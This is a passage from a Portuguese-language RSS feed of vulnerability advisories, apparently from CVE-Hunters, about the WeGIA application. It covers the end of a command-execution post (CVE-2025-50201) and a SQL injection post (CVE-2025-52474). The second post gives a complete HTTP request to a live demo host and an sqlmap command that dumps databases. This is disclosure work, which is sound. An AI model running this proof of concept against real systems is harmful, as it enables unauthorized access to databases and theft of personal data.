	srcset=&amp;#34;/p/cve-2025-50201/image-1_hu_ea0b5b7bb573c69a.png 480w, /p/cve-2025-50201/image-1_hu_9c883581664d6ba6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;273&amp;#34;
		data-flex-basis=&amp;#34;657px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;2-verificação&amp;#34;&amp;gt;2. Verificação:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Após a execução do comando, o arquivo criado tornou-se publicamente acessível através do navegador na seguinte URL: &amp;lt;code&amp;gt;https://demo.wegia.org/html/configuracao/prova_tcc.html&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-50201/image-2.png&amp;#34;
	width=&amp;#34;1909&amp;#34;
	height=&amp;#34;1079&amp;#34;
	srcset=&amp;#34;/p/cve-2025-50201/image-2_hu_5fab827df7411270.png 480w, /p/cve-2025-50201/image-2_hu_3bc2d6e16b2b3902.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;176&amp;#34;
		data-flex-basis=&amp;#34;424px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Após a execução do comando, a página &amp;lt;code&amp;gt;https://demo.wegia.org/&amp;lt;/code&amp;gt; foi modificada conforme a imagem abaixo:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-50201/image-3.png&amp;#34;
	width=&amp;#34;1906&amp;#34;
	height=&amp;#34;1005&amp;#34;
	srcset=&amp;#34;/p/cve-2025-50201/image-3_hu_a90f67d31bb417bd.png 480w, /p/cve-2025-50201/image-3_hu_89baf0ab6503b852.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;455px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A exploração bem-sucedida desta vulnerabilidade permite que um invasor não autenticado:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Comprometa a Confidencialidade: Leia arquivos confidenciais do servidor, incluindo o código-fonte do aplicativo, chaves de API e arquivos de configuração.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Comprometa a Integridade: Modifique ou exclua qualquer arquivo para o qual o usuário www-data tenha permissões de gravação, permitindo a desfiguração de sites, injeção de malware ou destruição de aplicativos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Comprometa a Disponibilidade: Execute comandos que consomem recursos do sistema (CPU, Memória), levando a uma Negação de Serviço (DoS).&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Aja como um Pivô: Use o servidor comprometido como base para atacar outros sistemas na rede interna.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-52p5-5fmw-9hrf&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-52p5-5fmw-9hrf&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reportado-por&amp;#34;&amp;gt;Reportado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;amp;utm_campaign=share_via&amp;amp;amp;utm_content=profile&amp;amp;amp;utm_medium=android_app&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/pedro50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;amp;utm_campaign=share_via&amp;amp;amp;utm_content=profile&amp;amp;amp;utm_medium=android_app&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Pedro Lyrio&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 19 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-52474</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-52474/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-52474/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-52474-vulnerabilidade-de-injeção-sql-no-parâmetro-id-do-endpoint-controlphp&amp;#34;&amp;gt;CVE-2025-52474: Vulnerabilidade de Injeção SQL no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-52474&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-52474&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Injeção SQL foi identificada no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/WeGIA/controle/control.php&amp;lt;/code&amp;gt;. Esta vulnerabilidade permite que invasores manipulem consultas SQL e acessem informações confidenciais do banco de dados, como nomes de tabelas e dados sensíveis.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;GET /controle/control.php?nomeClasse=MedicamentoControle&amp;amp;amp;metodo=adicionarMedicamento&amp;amp;amp;modulo=pet&amp;amp;amp;nomeMedicamento=DApvMr&amp;amp;amp;id=&amp;amp;lt;PAYLOAD&amp;amp;gt;&amp;amp;amp;aplicacaoMedicamento=YqchRf&amp;amp;amp;descricaoMedicamento=Mrnfdh HTTP/1.1&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Salve a solicitação no arquivo req.txt:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /controle/control.php?nomeClasse=MedicamentoControle&amp;amp;amp;metodo=adicionarMedicamento&amp;amp;amp;modulo=pet&amp;amp;amp;nomeMedicamento=DApvMr&amp;amp;amp;id=1&amp;amp;amp;aplicacaoMedicamento=YqchRf&amp;amp;amp;descricaoMedicamento=Mrnfdh HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-platform: &amp;amp;#34;Windows&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua: &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;, &amp;amp;#34;Google Chrome&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;, &amp;amp;#34;Not.A/Brand&amp;amp;#34;;v=&amp;amp;#34;99&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://demo.wegia.org/html/home.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga=GA1.1.2068698375.1747601288; _ga_F8DXBXLV8J=GS2.1.s1747660538$o4$g0$t1747660538$j60$l0$h0$dyaL3bJ27Uic34e3jqHnkw5lGenE0npxF8g; PHPSESSID=o79b1cq9suo2gksfpnvr4cus4o
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Em seguida, use o sqlmap:&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-52474-vulnerabilidade-de-injeção-sql-no-parâmetro-id-do-endpoint-controlphp&amp;#34;&amp;gt;CVE-2025-52474: Vulnerabilidade de Injeção SQL no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-52474&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-52474&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Injeção SQL foi identificada no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/WeGIA/controle/control.php&amp;lt;/code&amp;gt;. Esta vulnerabilidade permite que invasores manipulem consultas SQL e acessem informações confidenciais do banco de dados, como nomes de tabelas e dados sensíveis.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;GET /controle/control.php?nomeClasse=MedicamentoControle&amp;amp;amp;metodo=adicionarMedicamento&amp;amp;amp;modulo=pet&amp;amp;amp;nomeMedicamento=DApvMr&amp;amp;amp;id=&amp;amp;lt;PAYLOAD&amp;amp;gt;&amp;amp;amp;aplicacaoMedicamento=YqchRf&amp;amp;amp;descricaoMedicamento=Mrnfdh HTTP/1.1&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Salve a solicitação no arquivo req.txt:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /controle/control.php?nomeClasse=MedicamentoControle&amp;amp;amp;metodo=adicionarMedicamento&amp;amp;amp;modulo=pet&amp;amp;amp;nomeMedicamento=DApvMr&amp;amp;amp;id=1&amp;amp;amp;aplicacaoMedicamento=YqchRf&amp;amp;amp;descricaoMedicamento=Mrnfdh HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-platform: &amp;amp;#34;Windows&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua: &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;, &amp;amp;#34;Google Chrome&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;, &amp;amp;#34;Not.A/Brand&amp;amp;#34;;v=&amp;amp;#34;99&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://demo.wegia.org/html/home.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga=GA1.1.2068698375.1747601288; _ga_F8DXBXLV8J=GS2.1.s1747660538$o4$g0$t1747660538$j60$l0$h0$dyaL3bJ27Uic34e3jqHnkw5lGenE0npxF8g; PHPSESSID=o79b1cq9suo2gksfpnvr4cus4o
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Em seguida, use o sqlmap:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sqlmap -r req -p id --risk=3 --level=5 --dbs --batch --dbms=mysql --batch 
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-52474/image.png&amp;#34;
	width=&amp;#34;1263&amp;#34;
	height=&amp;#34;568&amp;#34;
	srcset=&amp;#34;/p/cve-2025-52474/image_hu_41d3edbfdda17cfa.png 480w, /p/cve-2025-52474/image_hu_6c25fed07133c2cd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;222&amp;#34;
		data-flex-basis=&amp;#34;533px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados sensíveis: Um invasor pode acessar informações confidenciais, como credenciais, dados pessoais ou financeiros.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento de contas de usuários: Usando credenciais roubadas, invasores podem obter acesso total ao aplicativo e executar ações em nome de usuários legítimos.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exfiltração de dados: Possibilidade de roubo de grandes volumes de informações, despejando tabelas inteiras do banco de dados.&amp;lt;/li&amp;gt;
